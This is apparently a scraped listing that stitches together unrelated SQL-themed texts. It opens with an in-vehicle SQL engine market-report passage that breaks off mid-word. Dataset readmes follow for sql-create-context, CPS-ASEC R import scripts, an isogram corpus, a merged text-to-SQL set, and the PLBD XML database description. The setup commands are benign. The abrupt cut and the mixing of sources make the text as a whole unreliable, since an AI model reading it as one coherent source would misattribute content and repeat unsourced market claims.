One of the most significant growth factors for the in-vehicle SQL query engine market is the rapid digital transformation within the automotive industry. The proliferation of connected vehicles has led to an exponential increase in the volume and complexity of data generated by onboard sensors, infotainment units, and telematics systems. Automakers and OEMs are increasingly leveraging SQL query engines to process and analyze this data in real time, enabling enhanced vehicle performance, predictive maintenance, and personalized user experiences. The shift towards software-defined vehicles and the rising implementation of edge computing within vehicles further underscore the necessity for robust, scalable, and efficient SQL query engines that can handle diverse data streams and deliver actionable insights with minimal latency.
Another key driver is the growing emphasis on safety, security, and regulatory compliance across global automotive markets. Advanced driver-assistance systems (ADAS), telematics, and fleet management platforms rely heavily on accurate and timely data retrieval to ensure optimal operation and compliance with evolving safety standards. SQL query engines provide the backbone for these mission-critical applications by facilitating complex queries and aggregating data from multiple subsystems in real time. Furthermore, as vehicles become increasingly autonomous and connected, the need for secure, reliable, and high-performance data management solutions is intensifying, pushing automotive stakeholders to invest in advanced in-vehicle SQL query engine technologies.
The expanding ecosystem of electric vehicles (EVs) and the rise of mobility-as-a-service (MaaS) platforms are also catalyzing the growth of the in-vehicle SQL query engine market. EVs, with their sophisticated battery management systems and connected infrastructure, generate vast amounts of operational and diagnostic data that require efficient querying and analysis. Similarly, fleet operators and mobility service providers are adopting SQL query engines to optimize route planning, monitor vehicle health, and enhance customer satisfaction. These evolving market dynamics are expected to drive sustained demand for in-vehicle SQL query engines across both passenger and commercial vehicle segments, fostering innovation and competition among technology vendors.
From a regional perspective, Asia Pacific is emerging as a dominant force in the in-vehicle SQL query engine market, fueled by the rapid adoption of connected vehicle technologies in China, Japan, and South Korea. North America and Europe continue to be significant markets, driven by early technological adoption, stringent safety regulations, and the presence of leading automotive OEMs. The Middle East & Africa and Latin America are also witnessing steady growth, supported by increasing investments in smart mobility and telematics infrastructure. The regional outlook remains highly promising, with each geography contributing uniquely to the global expansion of the in-vehicle SQL query engine market.
The component segment of the in-vehicle SQL query engine market is broadly categorized into software, hardware, and services. The software sub-segment holds the largest market share, driven by the rising demand for advanced query processing, analytics, and data management solutions within vehicle ecosystems. Automotive software platforms are evolving to support complex SQL queries that enable real-time data aggregation, event detection, and predictive analytics. Vendors are focusing on developing lig
License: Attribution 4.0 (CC BY 4.0) - https://creativecommons.org/licenses/by/4.0/
Overview
This dataset builds from sql-create-context.

@misc{b-mc2_2023_sql-create-context,
  title  = {sql-create-context Dataset},
  author = {b-mc2},
  year   = {2023},
  url    = {https://huggingface.co/datasets/b-mc2/sql-create-context},
  note   = {This dataset was created by modifying data from the following sources: \cite{zhongSeq2SQL2017, yu2018spider}.},
}
License: CC0 1.0 Universal Public Domain Dedication - https://creativecommons.org/publicdomain/zero/1.0/
analyze the current population survey (cps) annual social and economic supplement (asec) with r

the annual march cps-asec has been supplying the statistics for the census bureau's report on income, poverty, and health insurance coverage since 1948. wow. the us census bureau and the bureau of labor statistics (bls) tag-team on this one. until the american community survey (acs) hit the scene in the early aughts (2000s), the current population survey had the largest sample size of all the annual general demographic data sets outside of the decennial census - about two hundred thousand respondents. this provides enough sample to conduct state- and a few large metro area-level analyses. your sample size will vanish if you start investigating subgroups by state - consider pooling multiple years. county-level is a no-no.

despite the american community survey's larger size, the cps-asec contains many more variables related to employment, sources of income, and insurance - and can be trended back to harry truman's presidency. aside from questions specifically asked about an annual experience (like income), many of the questions in this march data set should be treated as point-in-time statistics. cps-asec generalizes to the united states non-institutional, non-active duty military population.

the national bureau of economic research (nber) provides sas, spss, and stata importation scripts to create a rectangular file (rectangular data means only person-level records; household- and family-level information gets attached to each person). to import these files into r, the parse.SAScii function uses nber's sas code to determine how to import the fixed-width file, then RSQLite to put everything into a schnazzy database. you can try reading through the nber march 2012 sas importation code yourself, but it's a bit of a proc freak show.

this new github repository contains three scripts:

2005-2012 asec - download all microdata.R
- download the fixed-width file containing household, family, and person records
- import by separating this file into three tables, then merge 'em together at the person-level
- download the fixed-width file containing the person-level replicate weights
- merge the rectangular person-level file with the replicate weights, then store it in a sql database
- create a new variable - one - in the data table

2012 asec - analysis examples.R
- connect to the sql database created by the 'download all microdata' program
- create the complex sample survey object, using the replicate weights
- perform a boatload of analysis examples

replicate census estimates - 2011.R
- connect to the sql database created by the 'download all microdata' program
- create the complex sample survey object, using the replicate weights
- match the sas output shown in the png file below

2011 asec replicate weight sas output.png: statistic and standard error generated from the replicate-weighted example sas script contained in this census-provided person replicate weights usage instructions document.

click here to view these three scripts

for more detail about the current population survey - annual social and economic supplement (cps-asec), visit:
- the census bureau's current population survey page
- the bureau of labor statistics' current population survey page
- the current population survey's wikipedia article

notes: interviews are conducted in march about experiences during the previous year. the file labeled 2012 includes information (income, work experience, health insurance) pertaining to 2011. when you use the current population survey to talk about america, subtract a year from the data file name. as of the 2010 file (the interview focusing on america during 2009), the cps-asec contains exciting new medical out-of-pocket spending variables most useful for supplemental (medical spending-adjusted) poverty research.

confidential to sas, spss, stata, sudaan users: why are you still rubbing two sticks together after we've invented the butane lighter? time to transition to r. :D
License: Attribution 4.0 (CC BY 4.0) - https://creativecommons.org/licenses/by/4.0/
A collection of datasets and python scripts for extraction and analysis of isograms (and some palindromes and tautonyms) from corpus-based word-lists, specifically Google Ngram and the British National Corpus (BNC). Below follows a brief description, first, of the included datasets and, second, of the included scripts.

1. Datasets

The data from English Google Ngrams and the BNC is available in two formats: as a plain text CSV file and as a SQLite3 database.

1.1 CSV format

The CSV files for each dataset actually come in two parts: one labelled ".csv" and one ".totals". The ".csv" file contains the actual extracted data, and the ".totals" file contains some basic summary statistics about the ".csv" dataset with the same name.

The CSV files contain one row per data point, with the columns separated by a single tab stop. There are no labels at the top of the files. Each line has the following columns, in this order (the labels below are what I use in the database, which has an identical structure, see section below):
| Label | Data type | Description |
|-------|-----------|-------------|
| isogramy | int | The order of isogramy, e.g. "2" is a second order isogram |
| length | int | The length of the word in letters |
| word | text | The actual word/isogram in ASCII |
| source_pos | text | The Part of Speech tag from the original corpus |
| count | int | Token count (total number of occurrences) |
| vol_count | int | Volume count (number of different sources which contain the word) |
| count_per_million | int | Token count per million words |
| vol_count_as_percent | int | Volume count as percentage of the total number of volumes |
| is_palindrome | bool | Whether the word is a palindrome (1) or not (0) |
| is_tautonym | bool | Whether the word is a tautonym (1) or not (0) |
The ".totals" files have a slightly different format, with one row per data point, where the first column is the label and the second column is the associated value. The ".totals" files contain the following data:
Label
Data type
Description
!total_1grams
int
The total number of words in the corpus
!total_volumes
int
The total number of volumes (individual sources) in the corpus
!total_isograms
int
The total number of isograms found in the corpus (before compacting)
!total_palindromes
int
How many of the isograms found are palindromes
!total_tautonyms
int
How many of the isograms found are tautonyms
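A minimal sketch of reading one of the ".csv" files with pandas, assuming the file naming used later for the database step (ngrams-isograms.csv); the files are tab-separated and unlabelled, so the column names described above are supplied explicitly.

```python
import pandas as pd

columns = [
    "isogramy", "length", "word", "source_pos", "count", "vol_count",
    "count_per_million", "vol_count_as_percent", "is_palindrome", "is_tautonym",
]

# Tab-separated, no header row (see the column description above).
ngrams = pd.read_csv("ngrams-isograms.csv", sep="\t", header=None, names=columns)
print(ngrams.head())
```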
The CSV files are mainly useful for further automated data processing. For working with the data set directly (e.g. to do statistics or cross-check entries), I would recommend using the database format described below.

1.2 SQLite database format

On the other hand, the SQLite database combines the data from all four of the plain text files, and adds various useful combinations of the two datasets, namely:

• Compacted versions of each dataset, where identical headwords are combined into a single entry.
• A combined compacted dataset, combining and compacting the data from both Ngrams and the BNC.
• An intersected dataset, which contains only those words which are found in both the Ngrams and the BNC dataset.

The intersected dataset is by far the least noisy, but is missing some real isograms, too. The columns/layout of each of the tables in the database is identical to that described for the CSV/.totals files above. To get an idea of the various ways the database can be queried for various bits of data, see the R script described below, which computes statistics based on the SQLite database.

2. Scripts

There are three scripts: one for tidying Ngram and BNC word lists and extracting isograms, one to create a neat SQLite database from the output, and one to compute some basic statistics from the data. The first script can be run using Python 3, the second script can be run using SQLite 3 from the command line, and the third script can be run in R/RStudio (R version 3).

2.1 Source data

The scripts were written to work with word lists from Google Ngram and the BNC, which can be obtained from http://storage.googleapis.com/books/ngrams/books/datasetsv2.html and https://www.kilgarriff.co.uk/bnc-readme.html (download all.al.gz). For Ngram the script expects the path to the directory containing the various files, for BNC the direct path to the *.gz file.

2.2 Data preparation

Before processing proper, the word lists need to be tidied to exclude superfluous material and some of the most obvious noise. This will also bring them into a uniform format. Tidying and reformatting can be done by running one of the following commands:

python isograms.py --ngrams --indir=INDIR --outfile=OUTFILE
python isograms.py --bnc --indir=INFILE --outfile=OUTFILE

Replace INDIR/INFILE with the input directory or filename and OUTFILE with the filename for the tidied and reformatted output.

2.3 Isogram extraction

After preparing the data as above, isograms can be extracted by running the following command on the reformatted and tidied files:

python isograms.py --batch --infile=INFILE --outfile=OUTFILE

Here INFILE should refer to the output from the previous data cleaning process. Please note that the script will actually write two output files, one named OUTFILE with a word list of all the isograms and their associated frequency data, and one named "OUTFILE.totals" with very basic summary statistics.

2.4 Creating a SQLite3 database

The output data from the above step can be easily collated into a SQLite3 database which allows for easy querying of the data directly for specific properties. The database can be created by following these steps:

1. Make sure the files with the Ngrams and BNC data are named "ngrams-isograms.csv" and "bnc-isograms.csv" respectively. (The script assumes you have both of them; if you only want to load one, just create an empty file for the other one.)
2. Copy the "create-database.sql" script into the same directory as the two data files.
3. On the command line, go to the directory where the files and the SQL script are.
4. Type: sqlite3 isograms.db < create-database.sql
5. This will create a database called "isograms.db".

See section 1 for a basic description of the output data and how to work with the database.

2.5 Statistical processing

The repository includes an R script (R version 3) named "statistics.r" that computes a number of statistics about the distribution of isograms by length, frequency, contextual diversity, etc. This can be used as a starting point for running your own stats. It uses RSQLite to access the SQLite database version of the data described above.
This dataset is a merged collection of multiple text-to-SQL datasets, designed to provide a comprehensive resource for training and evaluating text-to-SQL models. It combines data from several popular benchmarks, including Spider, CoSQL, SparC, and others, to create a diverse and robust dataset for natural language to SQL query generation tasks.

Dataset Details
- Curated by: Mudasir Ahmad Mir
- Language(s) (NLP): English
- License: Apache 2.0

This dataset is ideal for researchers… See the full description on the dataset page: https://huggingface.co/datasets/Mudasir692/text-to-sql.
License: Attribution 4.0 (CC BY 4.0) - https://creativecommons.org/licenses/by/4.0/
The provided ZIP archive contains an XML file "main-database-description.xml" with the description of all tables (VIEWS) that are exposed publicly at the PLBD server (https://plbd.org/). In the XML file, all columns of the visible tables are described, specifying their SQL types, measurement units, semantics, calculation formulae, SQL statements that can be used to generate values in these columns, and publications of the formulae derivations.
The XML file conforms to the published XSD schema created for descriptions of relational databases for specifications of scientific measurement data. The XSD schema ("relational-database_v2.0.0-rc.18.xsd") and all included sub-schemas are provided in the same archive for convenience. All XSD schemas are validated against the "XMLSchema.xsd" schema from the W3C consortium.
The ZIP file contains the excerpt from the files hosted in the https://plbd.org/ at the moment of submission of the PLBD database in the Scientific Data journal, and is provided to conform the journal policies. The current data and schemas should be fetched from the published URIs:
https://plbd.org/
https://plbd.org/doc/db/schemas
https://plbd.org/doc/xml/schemas
The software used to generate SQL schemas and RestfulDB metadata, as well as the RestfulDB middleware that allows publishing the databases generated from the XML description on the Web, are available at public Subversion repositories:
svn://www.crystallography.net/solsa-database-scripts
svn://saulius-grazulis.lt/restfuldb
The unpacked ZIP file will create the "db/" directory with the tree layout given below. In addition to the database description file "main-database-description.xml", all XSD schemas necessary for validation of the XML file are provided. On a GNU/Linux operating system with a GNU Make package installed, the XML file validity can be checked by unpacking the ZIP file, entering the unpacked directory, and running 'make distclean; make'. For example, on a Linux Mint distribution, the following commands should work:
unzip main-database-description.zip
cd db/release/v0.10.0/tables/
sh -x dependencies/Linuxmint-20.1/install.sh
make distclean
make
If necessary, additional packages can be installed using the 'install.sh' script in the 'dependencies/' subdirectory corresponding to your operating system. As of the moment of writing, Debian-10 and Linuxmint-20.1 OSes are supported out of the box; similar OSes might work with the same 'install.sh' scripts. The installation scripts require to run package installation command under system administrator privileges, but they use only the standard system package manager, thus they should not put your system at risk. For validation and syntax checking, the 'rxp' and 'xmllint' programs are used.
The log files provided in the "outputs/validation" subdirectory contain validation logs obtained on the system where the XML files were last checked and should indicate validity of the provided XML file against the references schemas.
db/
└── release
└── v0.10.0
└── tables
├── Makeconfig-validate-xml
├── Makefile
├── Makelocal-validate-xml
├── dependencies
├── main-database-description.xml
├── outputs
└── schema
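As an alternative to the rxp/xmllint-based Makefile check, a minimal lxml sketch (not part of the archive) for validating the description against the main XSD schema could look like this, with paths assumed relative to the unpacked db/release/v0.10.0/tables/ directory:

```python
from lxml import etree

# Validate main-database-description.xml against the provided XSD schema.
schema = etree.XMLSchema(etree.parse("schema/relational-database_v2.0.0-rc.18.xsd"))
doc = etree.parse("main-database-description.xml")

if schema.validate(doc):
    print("main-database-description.xml is valid")
else:
    print(schema.error_log)
```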